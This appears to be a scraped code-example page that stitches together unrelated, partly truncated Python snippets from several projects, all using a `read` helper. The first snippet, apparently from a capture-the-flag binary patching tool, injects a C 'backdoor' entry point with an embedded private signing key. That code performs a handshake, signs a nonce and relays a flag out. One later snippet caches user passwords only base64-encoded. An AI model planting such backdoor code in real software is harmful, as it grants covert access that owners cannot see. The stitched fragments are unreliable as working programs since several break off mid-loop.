    # Inline tweetnacl plus the embedded private (signing) key.
    c = read('backdoor/tweetnacl.c')
    c = c.replace('#include "tweetnacl.h"', '')
    h = read('backdoor/tweetnacl.h')
    privkey = read('backdoor/privkey.h')
    randombytes = r'''
    void randombytes(uint8_t *msg, uint64_t len) {
        random(msg, (uint32_t)len, 0);
    }
    '''

    code = r'''
    void _start() {
        uint32_t negotiate = 2;
        transmit(3, &negotiate, 4, 0);
        for (int i = 0; i < 3; i++) {
            receive(3, &negotiate, 4, 0);
        }

        // generate handshake key
        char key[9] = {'E', 'C', 'A', 'F'};
        // random length from 5-8
        uint8_t b = 0;
        random(&b, 1, 0);
        int length = 5 + (b % 4);

        for (int i = 4; i < length; i++) {
            uint8_t b = 0;
            while (!b) random(&b, 1, 0);
            key[i] = b;
            for (int j = 0; j < 4; j++) {
                key[j] ^= b;
            }
        }
        transmit(1, key, length, 0);

        // wait for key response
        for (int i = 0; i < length; i++) {
            key[i] ^= 0xff;
        }
        char ring[8] = {0};
        int p = 0;
        while (1) {
            uint32_t count = 0;
            if (receive(0, ring + p, 1, &count) || count == 0) _terminate(1);
            int match = 0;
            for (int i = 0; i < length; i++) {
                int off = (p - length + i + 1) % 8;
                if (off < 0) off += 8;
                if (ring[off] != key[i]) break;
                match++;
            }
            if (match == length) break;

            p = (p + 1) % 8;
        }

        uint8_t nonce[8];
        if (receive(0, nonce, 8, 0)) _terminate(1);

        uint8_t *sm;
        uint64_t smlen = 8 + crypto_sign_BYTES;
        if (allocate(smlen, 0, &sm)) _terminate(1);
        crypto_sign(sm, &smlen, nonce, 8, privkey);

        size_t size = smlen;
        transmit(1, &size, 4, 0);
        transmit(1, sm, size, 0);

        char flag[4];
        receive(0, flag, 4, 0);
        transmit(3, flag, 4, 0);

        _terminate(0);
    }
    '''

    # Assemble the full translation unit and inject it as the POV entry point.
    code = h + privkey + code + randombytes + c
    pt.entry = pt.inject(c=code)
	def __init__(self, cfg):
		"""Open the credential cache stored in file `cfg`.

		The file holds a base64-encoded JSON object; a missing or empty
		file yields an empty cache.
		"""
		self.fname = cfg
		self._cache = json.loads(b64decode(read(cfg, default="")) or "{}")
Esempio n. 37
0
    maxSeqs = u.maxSeq(seqNums)
    for i in maxSeqs:
        for sth in i:
            #print >> ff,"[",
            for ssth in sth:
                print >> ff,ssth,
            #print >> ff,"]",
        print >> ff,""
    ff.close()



if __name__ == "__main__":
    ff = open('datas/result.txt','w')
    #S = u.read("datas/gxyseq.csv")
    S=u.read("PrefixSpan.txt")
    min_supp=0.05
    count = 0
    for each in S:
        count += 1
    patterns = prefixSpan(SquencePattern([], sys.maxint), S, min_supp * count)
    print_patterns(patterns)
    seqNums = []
    for each in patterns:
        seqNums.append(each.squence)
    maxSeqs = u.maxSeq(seqNums)
    print("The sequential patterns :")
    for i in maxSeqs:
        for sth in i:
            print "[",
            for ssth in sth:
Esempio n. 38
0
from oauth_dropins import tumblr as oauth_tumblr
from oauth_dropins.webutil.flask_util import flash
from oauth_dropins.webutil.util import json_dumps, json_loads
from werkzeug.exceptions import BadRequest

from flask_app import app
import models
import superfeedr
import util

logger = logging.getLogger(__name__)

# Tumblr avatar endpoint; %s is the blog hostname.
TUMBLR_AVATAR_URL = 'http://api.tumblr.com/v2/blog/%s/avatar/512'
DISQUS_API_CREATE_POST_URL = 'https://disqus.com/api/3.0/posts/create.json'
DISQUS_API_THREAD_DETAILS_URL = 'http://disqus.com/api/3.0/threads/details.json'
# Disqus API credentials are read from local secret files at import time.
DISQUS_ACCESS_TOKEN = util.read('disqus_access_token')
DISQUS_API_KEY = util.read('disqus_api_key')
DISQUS_API_SECRET = util.read('disqus_api_secret')

# Tumblr has no single standard markup or JS for integrating Disqus. It does
# have a default way, but themes often do it themselves, differently. Sigh.
# Details in https://github.com/snarfed/bridgy/issues/278
# Patterns that pull a Disqus shortname out of a Tumblr page. Raw strings keep
# the regex backslashes (\., \<space>) literal instead of relying on Python
# passing unknown escapes through — a DeprecationWarning since Python 3.6.
DISQUS_SHORTNAME_RES = (
    re.compile(
        r"""
    (?:https?://disqus\.com/forums|disqus[ -_]?(?:user|short)?name)
    \ *[=:/]\ *['"]?
    ([^/"\' ]+)     # the actual shortname
    """, re.IGNORECASE | re.VERBOSE),
    re.compile(r'https?://([^./"\' ]+)\.disqus\.com/embed\.js'),
)
Esempio n. 39
0
def main():
    test = read("test.rd")
    model = read("model.rd")

    predicted = model.predict(test.features[0])
    print np.mean(predicted == test.labels)
			# Prompt the user: hide input for passwords, echo otherwise (Python 2).
			p = (password and getpass.getpass or raw_input)(key)
			# Ask before caching; any answer starting with "n" skips the cache.
			if raw_input("store %s? [Y/n]: "%(password and "password" or "value")).lower().startswith("n"):
				return p
			# Cached values are stored base64-encoded, then flushed to disk.
			self._cache[dk] = b64encode(p)
			self._save()
		return b64decode(self._cache[dk])

# Module-level prompt cache backed by the ".ctp" file.
pc = PCache(".ctp")

def _getpass(val, ptype):
	if "{PASSWORD}" in val:
		val = val.replace("{PASSWORD}", pc("enter password (%s): "%(ptype,)))
	return val

# Build the global config from "ct.cfg": each line is "KEY = VALUE".
config = Config(cfg)
for key, val in [[term.strip() for term in line.split(" = ")] for line in read("ct.cfg", True)]:
	# These keys are boolean flags ("True"/"False" strings).
	if key in ["ENCODE", "DB_ECHO", "DB_PUBLIC", "GEO_TEST", "CACHE_REQUEST", "CACHE_DB"]:
		val = val == "True"
	if key == "DB":
		config.db.update(config.web.server, _getpass(val, "db"))
	elif key == "DB_TEST":
		config.db.update("test", _getpass(val, "test db"))
	else:
		# Other keys map onto nested config attributes: FOO_BAR -> config.foo.bar.
		target = key.lower()
		c = config
		if "_" in target:
			# These keys hold "|"-separated lists.
			if target in ["pubsub_botnames", "log_allow", "geo_user_geonames", "geo_user_google"]:
				val = val.split("|")
			path, target = target.rsplit("_", 1)
			for part in path.split("_"):
				c = getattr(c, part)
Esempio n. 41
0
# init my opener
# Query parameters for the form; the target site expects GBK-encoded text.
# NOTE(review): `code`, `name`, `baseurl`, `year`, `term` come from earlier in
# the file (not visible here) — presumably student id / name / endpoint.
paramters = urllib.urlencode({
    'xh': code,
    'xm': name.decode('utf-8').encode('gbk'),
    'gnmkdm': 'N121605'
})
# Reuse a previously saved Mozilla-format cookie jar so the session stays valid.
cookiename = 'cookie.dat'
cookie = cookielib.MozillaCookieJar(cookiename)
cookie.load(cookiename, ignore_discard=True, ignore_expires=True)
opener = getopener(cookie)

para_dct = {}
response = opener.open(baseurl + paramters)

temp_content = read(response)

# Scrape the ASP.NET postback state required to submit the form.
viewstate = re.compile('id="__VIEWSTATE" value="(.*)"').search(
    temp_content).groups()[0]
eventvali = re.compile('id="__EVENTVALIDATION" value="(.*)"').search(
    temp_content).groups()[0]

# Form fields: academic year range (e.g. "2013-2014") and the term selector.
para_dct['ddlxn'] = year + '-' + str(int(year) + 1)
para_dct['ddlxq'] = term
para_dct['btn_cx'] = ' 查  询 '.decode('utf-8').encode('gbk')
para_dct['__EVENTTARGET'] = ''
para_dct['__EVENTARGUMENT'] = ''
para_dct['__LASTFOCUS'] = ''
para_dct['__VIEWSTATE'] = viewstate
para_dct['__EVENTVALIDATION'] = eventvali
para_data = urllib.urlencode(para_dct)
Esempio n. 42
0
def declare(linker):
    """Feed the RC4 implementation's C source to the linker for auto-declaration."""
    rc4_source = read('crypto/rc4.c')
    linker.autodecl(rc4_source)
Esempio n. 43
0
def blob(bh):
    """Read and return the blob stored under name `bh` inside `dirpath`."""
    blob_path = os.path.join(dirpath, bh)
    return read(blob_path, 'r')
Esempio n. 44
0
            # Join this itemset's items with "&" (flag skips the separator
            # before the first item) and close the bracketed group.
            flag = False
            for item in each:
                if flag:
                    aitem += "&"
                aitem += item
                flag = True
            aitem += "]"
            name += aitem
            name += "]"
        print ("pattern:{0}, support:{1}".format(name, p.support))
        # Mirror the same line into the open result file (Python 2 chevron print).
        print >> ff, ("pattern:{0}, support:{1}".format(name, p.support))


if __name__ == "__main__":
    # NOTE(review): this snippet is truncated below — the innermost loop body
    # is missing from view.
    ff = open("datas/result.txt", "w")
    S = u.read("datas/gxyseq.csv")
    # Minimum support expressed as a fraction of the number of input sequences.
    min_supp = 0.01
    count = 0
    for each in S:
        count += 1
    patterns = prefixSpan(SquencePattern([], sys.maxint), S, min_supp * count)
    print_patterns(patterns)
    seqNums = []
    for each in patterns:
        seqNums.append(each.squence)
    # Keep only maximal sequences (drop patterns subsumed by a longer one).
    maxSeqs = u.maxSeq(seqNums)
    print ("The sequential patterns :")
    for i in maxSeqs:
        for sth in i:
            print "[",
            for ssth in sth:
Esempio n. 45
0
import os
import functools
from util import read
"""
Replace a custom heap with dlmalloc

Usage:
  from util import heap

  heap.declare(pt.linker)

  pt.patch(addr, sym='dlmalloc')
  pt.patch(addr, sym='dlcalloc')
  pt.patch(addr, sym='dlfree')
  pt.patch(addr, sym='dlrealloc')
"""

# Public API of this patch-helper module.
__all__ = ["apply"]

# dlmalloc replacement bundle: C prototypes for the four allocator entry
# points plus the implementation source, passed to linker.declare(**dlmalloc).
# NOTE(review): `read` loads 'heap/malloc.c' at import time.
dlmalloc = {'symbols': {
    'dlmalloc': 'void *dlmalloc(size_t size)',
    'dlfree': 'void dlfree(void *addr)',
    'dlcalloc': 'void *dlcalloc(size_t count, size_t size)',
    'dlrealloc': 'void *dlrealloc(void *addr, size_t size)',
}, 'source': read('heap/malloc.c')}

def declare(linker):
    """Declare the dlmalloc symbols and source on `linker`, at most once.

    No-op if 'dlmalloc' has already been declared on this linker.
    """
    # `x not in y` is the idiomatic spelling of `not x in y`.
    if 'dlmalloc' not in linker:
        linker.declare(**dlmalloc)
Esempio n. 46
0
    # Labels column of the (feature, label) sample pairs.
    y = np.array([s[1] for s in samples])

    clf = RandomForestClassifier(n_estimators=30)

    # Optional N-fold cross-validation, controlled by CLI flags.
    if args["-c"]:
        logger.debug("Performing N-fold cross-validation (N=%s)" % args["-f"])
        scores = cross_validation.cross_val_score(
            clf, X.toarray(), y, n_jobs=int(args["-j"]), cv=int(args["-f"]), scoring=args["-s"]
        )
        # NOTE(review): the label says "F1" but the metric is whatever
        # args["-s"] selects — confirm or reword.
        print("F1: %0.4f (+/- %0.4f)" % (scores.mean(), scores.std() * 2))

    logger.debug("Training model on all data")
    clf.fit(X.toarray(), y)

    logger.debug("Done, returning model and vocabulary")

    return (clf, vocabulary)


if __name__ == "__main__":
    # Write pickled classifier to stdout.
    # NOTE(review): despite the comment above, the model is written to the
    # file named by args["-o"], not to stdout.

    import cPickle as pickle  # Python 2 pickle
    import sys

    logging.basicConfig(level=logging.DEBUG)

    samples, vocabulary = util.read(args["<DATABASE>"])

    pickle.dump(train(samples, vocabulary), open(args["-o"], "wb"))
Esempio n. 47
0
    # Vectorize the user agent and run it through the classifier; return both
    # the feature matrix and the prediction.
    X = extract_features(ua, vocabulary)
    pred = clf.predict(X.toarray())

    return X, pred


if __name__ == "__main__":
    import cPickle as pickle  # Python 2 pickle
    import sys

    # Load the trained classifier and its feature vocabulary.
    clf, vocabulary = pickle.load(open(args["<MODEL>"], "rb"))

    if len(sys.argv) != 3:
        print >> sys.stderr, "Usage: %s clf input_file" % sys.argv[0]
        sys.exit(1)

    # Evaluate prediction accuracy over the labelled samples, dumping the
    # misclassified ones (with their feature vectors) for inspection.
    count = 0
    correct = 0
    samples, _ = util.read(args["<DATABASE>"])
    for ua, label in samples:
        X, Y_pred = predict(clf, ua, vocabulary)
        count += 1
        if label == Y_pred:
            correct += 1
        else:
            print ua, label, Y_pred[0]
            print X
            print

    print "Total: %d, Correct: %d, Ratio: %.2f" % (count, correct, (1.0 * correct / count))
Esempio n. 48
0
File: data.py Progetto: jamii/scampy
def load_responses(scam):
  """Return the non-empty response templates for `scam`.

  The responses file is a single blob with entries separated by '###';
  each entry is whitespace-trimmed and blank entries are dropped.
  """
  raw = read('scams/%s/responses' % scam)
  # str.strip() trims both ends in one call (was .lstrip().rstrip()).
  responses = [response.strip() for response in raw.split('###')]
  return [response for response in responses if response]